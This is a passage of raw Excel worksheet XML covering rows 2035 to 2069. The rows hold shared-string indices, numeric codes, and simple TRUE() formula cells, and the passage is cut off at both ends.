      <c r="B2035" t="s">
        <v>0</v>
      </c>
      <c r="C2035" t="s">
        <v>78</v>
      </c>
      <c r="D2035" t="s">
        <v>2097</v>
      </c>
      <c r="E2035" t="s">
        <v>1227</v>
      </c>
      <c r="F2035">
        <v>29117300</v>
      </c>
      <c r="G2035" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2035" t="s">
        <v>2373</v>
      </c>
      <c r="K2035">
        <v>0</v>
      </c>
      <c r="L2035" t="s">
        <v>98</v>
      </c>
      <c r="R2035" t="s">
        <v>5</v>
      </c>
      <c r="S2035" t="s">
        <v>1229</v>
      </c>
      <c r="T2035" t="s">
        <v>7</v>
      </c>
      <c r="U2035" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2036" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2036" s="1">
        <v>18404</v>
      </c>
      <c r="B2036" t="s">
        <v>0</v>
      </c>
      <c r="C2036" t="s">
        <v>78</v>
      </c>
      <c r="D2036" t="s">
        <v>2097</v>
      </c>
      <c r="E2036" t="s">
        <v>1227</v>
      </c>
      <c r="F2036">
        <v>29117300</v>
      </c>
      <c r="G2036" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2036" t="s">
        <v>2374</v>
      </c>
      <c r="K2036">
        <v>0</v>
      </c>
      <c r="L2036" t="s">
        <v>98</v>
      </c>
      <c r="R2036" t="s">
        <v>5</v>
      </c>
      <c r="S2036" t="s">
        <v>1229</v>
      </c>
      <c r="T2036" t="s">
        <v>7</v>
      </c>
      <c r="U2036" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2037" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2037" s="1">
        <v>18405</v>
      </c>
      <c r="B2037" t="s">
        <v>0</v>
      </c>
      <c r="C2037" t="s">
        <v>78</v>
      </c>
      <c r="D2037" t="s">
        <v>2097</v>
      </c>
      <c r="E2037" t="s">
        <v>1227</v>
      </c>
      <c r="F2037">
        <v>29117300</v>
      </c>
      <c r="G2037" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2037" t="s">
        <v>2375</v>
      </c>
      <c r="K2037">
        <v>0</v>
      </c>
      <c r="L2037" t="s">
        <v>98</v>
      </c>
      <c r="R2037" t="s">
        <v>5</v>
      </c>
      <c r="S2037" t="s">
        <v>1229</v>
      </c>
      <c r="T2037" t="s">
        <v>7</v>
      </c>
      <c r="U2037" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2038" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2038" s="1">
        <v>18406</v>
      </c>
      <c r="B2038" t="s">
        <v>0</v>
      </c>
      <c r="C2038" t="s">
        <v>78</v>
      </c>
      <c r="D2038" t="s">
        <v>2097</v>
      </c>
      <c r="E2038" t="s">
        <v>1227</v>
      </c>
      <c r="F2038">
        <v>29117300</v>
      </c>
      <c r="G2038" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2038" t="s">
        <v>2376</v>
      </c>
      <c r="K2038">
        <v>0</v>
      </c>
      <c r="L2038" t="s">
        <v>98</v>
      </c>
      <c r="R2038" t="s">
        <v>5</v>
      </c>
      <c r="S2038" t="s">
        <v>1229</v>
      </c>
      <c r="T2038" t="s">
        <v>7</v>
      </c>
      <c r="U2038" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2039" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2039" s="1">
        <v>18407</v>
      </c>
      <c r="B2039" t="s">
        <v>0</v>
      </c>
      <c r="C2039" t="s">
        <v>78</v>
      </c>
      <c r="D2039" t="s">
        <v>2097</v>
      </c>
      <c r="E2039" t="s">
        <v>1227</v>
      </c>
      <c r="F2039">
        <v>29117300</v>
      </c>
      <c r="G2039" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2039" t="s">
        <v>2377</v>
      </c>
      <c r="K2039">
        <v>0</v>
      </c>
      <c r="L2039" t="s">
        <v>98</v>
      </c>
      <c r="R2039" t="s">
        <v>5</v>
      </c>
      <c r="S2039" t="s">
        <v>1229</v>
      </c>
      <c r="T2039" t="s">
        <v>7</v>
      </c>
      <c r="U2039" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2040" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2040" s="1">
        <v>18408</v>
      </c>
      <c r="B2040" t="s">
        <v>0</v>
      </c>
      <c r="C2040" t="s">
        <v>78</v>
      </c>
      <c r="D2040" t="s">
        <v>2097</v>
      </c>
      <c r="E2040" t="s">
        <v>1227</v>
      </c>
      <c r="F2040">
        <v>29117300</v>
      </c>
      <c r="G2040" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2040" t="s">
        <v>2378</v>
      </c>
      <c r="K2040">
        <v>0</v>
      </c>
      <c r="L2040" t="s">
        <v>98</v>
      </c>
      <c r="R2040" t="s">
        <v>5</v>
      </c>
      <c r="S2040" t="s">
        <v>1229</v>
      </c>
      <c r="T2040" t="s">
        <v>7</v>
      </c>
      <c r="U2040" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2041" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2041" s="1">
        <v>18409</v>
      </c>
      <c r="B2041" t="s">
        <v>0</v>
      </c>
      <c r="C2041" t="s">
        <v>78</v>
      </c>
      <c r="D2041" t="s">
        <v>2097</v>
      </c>
      <c r="E2041" t="s">
        <v>1227</v>
      </c>
      <c r="F2041">
        <v>29117300</v>
      </c>
      <c r="G2041" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2041" t="s">
        <v>2379</v>
      </c>
      <c r="K2041">
        <v>0</v>
      </c>
      <c r="L2041" t="s">
        <v>98</v>
      </c>
      <c r="R2041" t="s">
        <v>5</v>
      </c>
      <c r="S2041" t="s">
        <v>1229</v>
      </c>
      <c r="T2041" t="s">
        <v>7</v>
      </c>
      <c r="U2041" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2042" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2042" s="1">
        <v>18410</v>
      </c>
      <c r="B2042" t="s">
        <v>0</v>
      </c>
      <c r="C2042" t="s">
        <v>78</v>
      </c>
      <c r="D2042" t="s">
        <v>2097</v>
      </c>
      <c r="E2042" t="s">
        <v>1227</v>
      </c>
      <c r="F2042">
        <v>29117300</v>
      </c>
      <c r="G2042" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2042" t="s">
        <v>2380</v>
      </c>
      <c r="K2042">
        <v>0</v>
      </c>
      <c r="L2042" t="s">
        <v>98</v>
      </c>
      <c r="R2042" t="s">
        <v>5</v>
      </c>
      <c r="S2042" t="s">
        <v>1229</v>
      </c>
      <c r="T2042" t="s">
        <v>7</v>
      </c>
      <c r="U2042" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2043" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2043" s="1">
        <v>18411</v>
      </c>
      <c r="B2043" t="s">
        <v>0</v>
      </c>
      <c r="C2043" t="s">
        <v>78</v>
      </c>
      <c r="D2043" t="s">
        <v>2097</v>
      </c>
      <c r="E2043" t="s">
        <v>1227</v>
      </c>
      <c r="F2043">
        <v>29117300</v>
      </c>
      <c r="G2043" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2043" t="s">
        <v>2381</v>
      </c>
      <c r="K2043">
        <v>0</v>
      </c>
      <c r="L2043" t="s">
        <v>98</v>
      </c>
      <c r="R2043" t="s">
        <v>5</v>
      </c>
      <c r="S2043" t="s">
        <v>1229</v>
      </c>
      <c r="T2043" t="s">
        <v>7</v>
      </c>
      <c r="U2043" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2044" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2044" s="1">
        <v>18412</v>
      </c>
      <c r="B2044" t="s">
        <v>0</v>
      </c>
      <c r="C2044" t="s">
        <v>78</v>
      </c>
      <c r="D2044" t="s">
        <v>2097</v>
      </c>
      <c r="E2044" t="s">
        <v>1227</v>
      </c>
      <c r="F2044">
        <v>29117300</v>
      </c>
      <c r="G2044" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2044" t="s">
        <v>2382</v>
      </c>
      <c r="K2044">
        <v>0</v>
      </c>
      <c r="L2044" t="s">
        <v>98</v>
      </c>
      <c r="R2044" t="s">
        <v>5</v>
      </c>
      <c r="S2044" t="s">
        <v>1229</v>
      </c>
      <c r="T2044" t="s">
        <v>7</v>
      </c>
      <c r="U2044" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2045" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2045" s="1">
        <v>18413</v>
      </c>
      <c r="B2045" t="s">
        <v>0</v>
      </c>
      <c r="C2045" t="s">
        <v>78</v>
      </c>
      <c r="D2045" t="s">
        <v>2097</v>
      </c>
      <c r="E2045" t="s">
        <v>1227</v>
      </c>
      <c r="F2045">
        <v>29117300</v>
      </c>
      <c r="G2045" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2045" t="s">
        <v>2383</v>
      </c>
      <c r="K2045">
        <v>0</v>
      </c>
      <c r="L2045" t="s">
        <v>98</v>
      </c>
      <c r="R2045" t="s">
        <v>5</v>
      </c>
      <c r="S2045" t="s">
        <v>1229</v>
      </c>
      <c r="T2045" t="s">
        <v>7</v>
      </c>
      <c r="U2045" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2046" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2046" s="1">
        <v>18414</v>
      </c>
      <c r="B2046" t="s">
        <v>0</v>
      </c>
      <c r="C2046" t="s">
        <v>78</v>
      </c>
      <c r="D2046" t="s">
        <v>2097</v>
      </c>
      <c r="E2046" t="s">
        <v>1227</v>
      </c>
      <c r="F2046">
        <v>29117300</v>
      </c>
      <c r="G2046" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2046" t="s">
        <v>2384</v>
      </c>
      <c r="K2046">
        <v>0</v>
      </c>
      <c r="L2046" t="s">
        <v>98</v>
      </c>
      <c r="R2046" t="s">
        <v>5</v>
      </c>
      <c r="S2046" t="s">
        <v>1229</v>
      </c>
      <c r="T2046" t="s">
        <v>7</v>
      </c>
      <c r="U2046" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2047" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2047" s="1">
        <v>18415</v>
      </c>
      <c r="B2047" t="s">
        <v>0</v>
      </c>
      <c r="C2047" t="s">
        <v>78</v>
      </c>
      <c r="D2047" t="s">
        <v>2385</v>
      </c>
      <c r="E2047" t="s">
        <v>1227</v>
      </c>
      <c r="F2047">
        <v>29117299</v>
      </c>
      <c r="G2047" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2047" t="s">
        <v>2386</v>
      </c>
      <c r="K2047">
        <v>0</v>
      </c>
      <c r="L2047" t="s">
        <v>98</v>
      </c>
      <c r="R2047" t="s">
        <v>5</v>
      </c>
      <c r="S2047" t="s">
        <v>1229</v>
      </c>
      <c r="T2047" t="s">
        <v>7</v>
      </c>
      <c r="U2047" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2048" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2048" s="1">
        <v>18416</v>
      </c>
      <c r="B2048" t="s">
        <v>0</v>
      </c>
      <c r="C2048" t="s">
        <v>78</v>
      </c>
      <c r="D2048" t="s">
        <v>2385</v>
      </c>
      <c r="E2048" t="s">
        <v>1227</v>
      </c>
      <c r="F2048">
        <v>29117299</v>
      </c>
      <c r="G2048" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2048" t="s">
        <v>2387</v>
      </c>
      <c r="K2048">
        <v>0</v>
      </c>
      <c r="L2048" t="s">
        <v>98</v>
      </c>
      <c r="R2048" t="s">
        <v>5</v>
      </c>
      <c r="S2048" t="s">
        <v>1229</v>
      </c>
      <c r="T2048" t="s">
        <v>7</v>
      </c>
      <c r="U2048" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2049" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2049" s="1">
        <v>18417</v>
      </c>
      <c r="B2049" t="s">
        <v>0</v>
      </c>
      <c r="C2049" t="s">
        <v>78</v>
      </c>
      <c r="D2049" t="s">
        <v>2385</v>
      </c>
      <c r="E2049" t="s">
        <v>1227</v>
      </c>
      <c r="F2049">
        <v>29117299</v>
      </c>
      <c r="G2049" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2049" t="s">
        <v>2388</v>
      </c>
      <c r="K2049">
        <v>0</v>
      </c>
      <c r="L2049" t="s">
        <v>98</v>
      </c>
      <c r="R2049" t="s">
        <v>5</v>
      </c>
      <c r="S2049" t="s">
        <v>1229</v>
      </c>
      <c r="T2049" t="s">
        <v>7</v>
      </c>
      <c r="U2049" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2050" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2050" s="1">
        <v>18418</v>
      </c>
      <c r="B2050" t="s">
        <v>0</v>
      </c>
      <c r="C2050" t="s">
        <v>78</v>
      </c>
      <c r="D2050" t="s">
        <v>2385</v>
      </c>
      <c r="E2050" t="s">
        <v>1227</v>
      </c>
      <c r="F2050">
        <v>29117299</v>
      </c>
      <c r="G2050" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2050" t="s">
        <v>2389</v>
      </c>
      <c r="K2050">
        <v>0</v>
      </c>
      <c r="L2050" t="s">
        <v>98</v>
      </c>
      <c r="R2050" t="s">
        <v>5</v>
      </c>
      <c r="S2050" t="s">
        <v>1229</v>
      </c>
      <c r="T2050" t="s">
        <v>7</v>
      </c>
      <c r="U2050" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2051" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2051" s="1">
        <v>18419</v>
      </c>
      <c r="B2051" t="s">
        <v>0</v>
      </c>
      <c r="C2051" t="s">
        <v>1</v>
      </c>
      <c r="D2051" t="s">
        <v>2385</v>
      </c>
      <c r="E2051" t="s">
        <v>1227</v>
      </c>
      <c r="F2051">
        <v>29117299</v>
      </c>
      <c r="G2051" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2051" t="s">
        <v>2390</v>
      </c>
      <c r="K2051">
        <v>0</v>
      </c>
      <c r="L2051" t="s">
        <v>98</v>
      </c>
      <c r="R2051" t="s">
        <v>5</v>
      </c>
      <c r="S2051" t="s">
        <v>1229</v>
      </c>
      <c r="T2051" t="s">
        <v>7</v>
      </c>
      <c r="U2051" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2052" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2052" s="1">
        <v>18420</v>
      </c>
      <c r="B2052" t="s">
        <v>0</v>
      </c>
      <c r="C2052" t="s">
        <v>78</v>
      </c>
      <c r="D2052" t="s">
        <v>2385</v>
      </c>
      <c r="E2052" t="s">
        <v>1227</v>
      </c>
      <c r="F2052">
        <v>29117299</v>
      </c>
      <c r="G2052" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2052" t="s">
        <v>2391</v>
      </c>
      <c r="K2052">
        <v>0</v>
      </c>
      <c r="L2052" t="s">
        <v>98</v>
      </c>
      <c r="R2052" t="s">
        <v>5</v>
      </c>
      <c r="S2052" t="s">
        <v>1229</v>
      </c>
      <c r="T2052" t="s">
        <v>7</v>
      </c>
      <c r="U2052" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2053" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2053" s="1">
        <v>18421</v>
      </c>
      <c r="B2053" t="s">
        <v>0</v>
      </c>
      <c r="C2053" t="s">
        <v>78</v>
      </c>
      <c r="D2053" t="s">
        <v>2385</v>
      </c>
      <c r="E2053" t="s">
        <v>1227</v>
      </c>
      <c r="F2053">
        <v>29117299</v>
      </c>
      <c r="G2053" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2053" t="s">
        <v>2392</v>
      </c>
      <c r="K2053">
        <v>0</v>
      </c>
      <c r="L2053" t="s">
        <v>98</v>
      </c>
      <c r="R2053" t="s">
        <v>5</v>
      </c>
      <c r="S2053" t="s">
        <v>1229</v>
      </c>
      <c r="T2053" t="s">
        <v>7</v>
      </c>
      <c r="U2053" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2054" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2054" s="1">
        <v>18422</v>
      </c>
      <c r="B2054" t="s">
        <v>0</v>
      </c>
      <c r="C2054" t="s">
        <v>78</v>
      </c>
      <c r="D2054" t="s">
        <v>2385</v>
      </c>
      <c r="E2054" t="s">
        <v>1227</v>
      </c>
      <c r="F2054">
        <v>29117299</v>
      </c>
      <c r="G2054" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2054" t="s">
        <v>2393</v>
      </c>
      <c r="K2054">
        <v>0</v>
      </c>
      <c r="L2054" t="s">
        <v>98</v>
      </c>
      <c r="R2054" t="s">
        <v>5</v>
      </c>
      <c r="S2054" t="s">
        <v>1229</v>
      </c>
      <c r="T2054" t="s">
        <v>7</v>
      </c>
      <c r="U2054" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2055" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2055" s="1">
        <v>18423</v>
      </c>
      <c r="B2055" t="s">
        <v>0</v>
      </c>
      <c r="C2055" t="s">
        <v>78</v>
      </c>
      <c r="D2055" t="s">
        <v>2385</v>
      </c>
      <c r="E2055" t="s">
        <v>1227</v>
      </c>
      <c r="F2055">
        <v>29117299</v>
      </c>
      <c r="G2055" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2055" t="s">
        <v>2394</v>
      </c>
      <c r="K2055">
        <v>0</v>
      </c>
      <c r="L2055" t="s">
        <v>98</v>
      </c>
      <c r="R2055" t="s">
        <v>5</v>
      </c>
      <c r="S2055" t="s">
        <v>1229</v>
      </c>
      <c r="T2055" t="s">
        <v>7</v>
      </c>
      <c r="U2055" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2056" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2056" s="1">
        <v>18424</v>
      </c>
      <c r="B2056" t="s">
        <v>0</v>
      </c>
      <c r="C2056" t="s">
        <v>78</v>
      </c>
      <c r="D2056" t="s">
        <v>2385</v>
      </c>
      <c r="E2056" t="s">
        <v>1227</v>
      </c>
      <c r="F2056">
        <v>29117299</v>
      </c>
      <c r="G2056" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2056" t="s">
        <v>2395</v>
      </c>
      <c r="K2056">
        <v>0</v>
      </c>
      <c r="L2056" t="s">
        <v>98</v>
      </c>
      <c r="R2056" t="s">
        <v>5</v>
      </c>
      <c r="S2056" t="s">
        <v>1229</v>
      </c>
      <c r="T2056" t="s">
        <v>7</v>
      </c>
      <c r="U2056" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2057" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2057" s="1">
        <v>18425</v>
      </c>
      <c r="B2057" t="s">
        <v>0</v>
      </c>
      <c r="C2057" t="s">
        <v>1</v>
      </c>
      <c r="D2057" t="s">
        <v>2385</v>
      </c>
      <c r="E2057" t="s">
        <v>1227</v>
      </c>
      <c r="F2057">
        <v>29117299</v>
      </c>
      <c r="G2057" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2057" t="s">
        <v>2396</v>
      </c>
      <c r="K2057">
        <v>0</v>
      </c>
      <c r="L2057" t="s">
        <v>98</v>
      </c>
      <c r="R2057" t="s">
        <v>5</v>
      </c>
      <c r="S2057" t="s">
        <v>1229</v>
      </c>
      <c r="T2057" t="s">
        <v>7</v>
      </c>
      <c r="U2057" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2058" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2058" s="1">
        <v>18426</v>
      </c>
      <c r="B2058" t="s">
        <v>0</v>
      </c>
      <c r="C2058" t="s">
        <v>78</v>
      </c>
      <c r="D2058" t="s">
        <v>2385</v>
      </c>
      <c r="E2058" t="s">
        <v>1227</v>
      </c>
      <c r="F2058">
        <v>29117299</v>
      </c>
      <c r="G2058" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2058" t="s">
        <v>2397</v>
      </c>
      <c r="K2058">
        <v>0</v>
      </c>
      <c r="L2058" t="s">
        <v>98</v>
      </c>
      <c r="R2058" t="s">
        <v>5</v>
      </c>
      <c r="S2058" t="s">
        <v>1229</v>
      </c>
      <c r="T2058" t="s">
        <v>7</v>
      </c>
      <c r="U2058" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2059" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2059" s="1">
        <v>18427</v>
      </c>
      <c r="B2059" t="s">
        <v>0</v>
      </c>
      <c r="C2059" t="s">
        <v>78</v>
      </c>
      <c r="D2059" t="s">
        <v>2385</v>
      </c>
      <c r="E2059" t="s">
        <v>1227</v>
      </c>
      <c r="F2059">
        <v>29117299</v>
      </c>
      <c r="G2059" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2059" t="s">
        <v>2398</v>
      </c>
      <c r="K2059">
        <v>0</v>
      </c>
      <c r="L2059" t="s">
        <v>98</v>
      </c>
      <c r="R2059" t="s">
        <v>5</v>
      </c>
      <c r="S2059" t="s">
        <v>1229</v>
      </c>
      <c r="T2059" t="s">
        <v>7</v>
      </c>
      <c r="U2059" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2060" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2060" s="1">
        <v>18428</v>
      </c>
      <c r="B2060" t="s">
        <v>0</v>
      </c>
      <c r="C2060" t="s">
        <v>78</v>
      </c>
      <c r="D2060" t="s">
        <v>2385</v>
      </c>
      <c r="E2060" t="s">
        <v>1227</v>
      </c>
      <c r="F2060">
        <v>29117299</v>
      </c>
      <c r="G2060" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2060" t="s">
        <v>2399</v>
      </c>
      <c r="K2060">
        <v>0</v>
      </c>
      <c r="L2060" t="s">
        <v>98</v>
      </c>
      <c r="R2060" t="s">
        <v>5</v>
      </c>
      <c r="S2060" t="s">
        <v>1229</v>
      </c>
      <c r="T2060" t="s">
        <v>7</v>
      </c>
      <c r="U2060" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2061" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2061" s="1">
        <v>18429</v>
      </c>
      <c r="B2061" t="s">
        <v>0</v>
      </c>
      <c r="C2061" t="s">
        <v>78</v>
      </c>
      <c r="D2061" t="s">
        <v>2385</v>
      </c>
      <c r="E2061" t="s">
        <v>1227</v>
      </c>
      <c r="F2061">
        <v>29117299</v>
      </c>
      <c r="G2061" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2061" t="s">
        <v>2400</v>
      </c>
      <c r="K2061">
        <v>0</v>
      </c>
      <c r="L2061" t="s">
        <v>98</v>
      </c>
      <c r="R2061" t="s">
        <v>5</v>
      </c>
      <c r="S2061" t="s">
        <v>1229</v>
      </c>
      <c r="T2061" t="s">
        <v>7</v>
      </c>
      <c r="U2061" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2062" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2062" s="1">
        <v>18430</v>
      </c>
      <c r="B2062" t="s">
        <v>0</v>
      </c>
      <c r="C2062" t="s">
        <v>1</v>
      </c>
      <c r="D2062" t="s">
        <v>2385</v>
      </c>
      <c r="E2062" t="s">
        <v>1227</v>
      </c>
      <c r="F2062">
        <v>29117299</v>
      </c>
      <c r="G2062" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2062" t="s">
        <v>2401</v>
      </c>
      <c r="K2062">
        <v>0</v>
      </c>
      <c r="L2062" t="s">
        <v>98</v>
      </c>
      <c r="R2062" t="s">
        <v>5</v>
      </c>
      <c r="S2062" t="s">
        <v>1229</v>
      </c>
      <c r="T2062" t="s">
        <v>7</v>
      </c>
      <c r="U2062" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2063" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2063" s="1">
        <v>18431</v>
      </c>
      <c r="B2063" t="s">
        <v>0</v>
      </c>
      <c r="C2063" t="s">
        <v>78</v>
      </c>
      <c r="D2063" t="s">
        <v>2385</v>
      </c>
      <c r="E2063" t="s">
        <v>1227</v>
      </c>
      <c r="F2063">
        <v>29117299</v>
      </c>
      <c r="G2063" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2063" t="s">
        <v>2402</v>
      </c>
      <c r="K2063">
        <v>0</v>
      </c>
      <c r="L2063" t="s">
        <v>98</v>
      </c>
      <c r="R2063" t="s">
        <v>5</v>
      </c>
      <c r="S2063" t="s">
        <v>1229</v>
      </c>
      <c r="T2063" t="s">
        <v>7</v>
      </c>
      <c r="U2063" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2064" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2064" s="1">
        <v>18432</v>
      </c>
      <c r="B2064" t="s">
        <v>0</v>
      </c>
      <c r="C2064" t="s">
        <v>78</v>
      </c>
      <c r="D2064" t="s">
        <v>2385</v>
      </c>
      <c r="E2064" t="s">
        <v>1227</v>
      </c>
      <c r="F2064">
        <v>29117299</v>
      </c>
      <c r="G2064" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2064" t="s">
        <v>2403</v>
      </c>
      <c r="K2064">
        <v>0</v>
      </c>
      <c r="L2064" t="s">
        <v>98</v>
      </c>
      <c r="R2064" t="s">
        <v>5</v>
      </c>
      <c r="S2064" t="s">
        <v>1229</v>
      </c>
      <c r="T2064" t="s">
        <v>7</v>
      </c>
      <c r="U2064" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2065" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2065" s="1">
        <v>18433</v>
      </c>
      <c r="B2065" t="s">
        <v>0</v>
      </c>
      <c r="C2065" t="s">
        <v>78</v>
      </c>
      <c r="D2065" t="s">
        <v>2385</v>
      </c>
      <c r="E2065" t="s">
        <v>1227</v>
      </c>
      <c r="F2065">
        <v>29117299</v>
      </c>
      <c r="G2065" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2065" t="s">
        <v>2404</v>
      </c>
      <c r="K2065">
        <v>0</v>
      </c>
      <c r="L2065" t="s">
        <v>98</v>
      </c>
      <c r="R2065" t="s">
        <v>5</v>
      </c>
      <c r="S2065" t="s">
        <v>1229</v>
      </c>
      <c r="T2065" t="s">
        <v>7</v>
      </c>
      <c r="U2065" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2066" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2066" s="1">
        <v>18434</v>
      </c>
      <c r="B2066" t="s">
        <v>0</v>
      </c>
      <c r="C2066" t="s">
        <v>1</v>
      </c>
      <c r="D2066" t="s">
        <v>2385</v>
      </c>
      <c r="E2066" t="s">
        <v>1227</v>
      </c>
      <c r="F2066">
        <v>29117299</v>
      </c>
      <c r="G2066" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2066" t="s">
        <v>2405</v>
      </c>
      <c r="K2066">
        <v>0</v>
      </c>
      <c r="L2066" t="s">
        <v>98</v>
      </c>
      <c r="R2066" t="s">
        <v>5</v>
      </c>
      <c r="S2066" t="s">
        <v>1229</v>
      </c>
      <c r="T2066" t="s">
        <v>7</v>
      </c>
      <c r="U2066" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2067" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2067" s="1">
        <v>18435</v>
      </c>
      <c r="B2067" t="s">
        <v>0</v>
      </c>
      <c r="C2067" t="s">
        <v>78</v>
      </c>
      <c r="D2067" t="s">
        <v>2385</v>
      </c>
      <c r="E2067" t="s">
        <v>1227</v>
      </c>
      <c r="F2067">
        <v>29117299</v>
      </c>
      <c r="G2067" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2067" t="s">
        <v>2406</v>
      </c>
      <c r="K2067">
        <v>0</v>
      </c>
      <c r="L2067" t="s">
        <v>98</v>
      </c>
      <c r="R2067" t="s">
        <v>5</v>
      </c>
      <c r="S2067" t="s">
        <v>1229</v>
      </c>
      <c r="T2067" t="s">
        <v>7</v>
      </c>
      <c r="U2067" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2068" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2068" s="1">
        <v>18436</v>
      </c>
      <c r="B2068" t="s">
        <v>0</v>
      </c>
      <c r="C2068" t="s">
        <v>78</v>
      </c>
      <c r="D2068" t="s">
        <v>2385</v>
      </c>
      <c r="E2068" t="s">
        <v>1227</v>
      </c>
      <c r="F2068">
        <v>29117299</v>
      </c>
      <c r="G2068" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2068" t="s">
        <v>2407</v>
      </c>
      <c r="K2068">
        <v>0</v>
      </c>
      <c r="L2068" t="s">
        <v>98</v>
      </c>
      <c r="R2068" t="s">
        <v>5</v>
      </c>
      <c r="S2068" t="s">
        <v>1229</v>
      </c>
      <c r="T2068" t="s">
        <v>7</v>
      </c>
      <c r="U2068" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2069" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2069" s="1">
        <v>18437</v>
      </c>
      <c r="B2069" t="s">
        <v>0</v>
      </c>
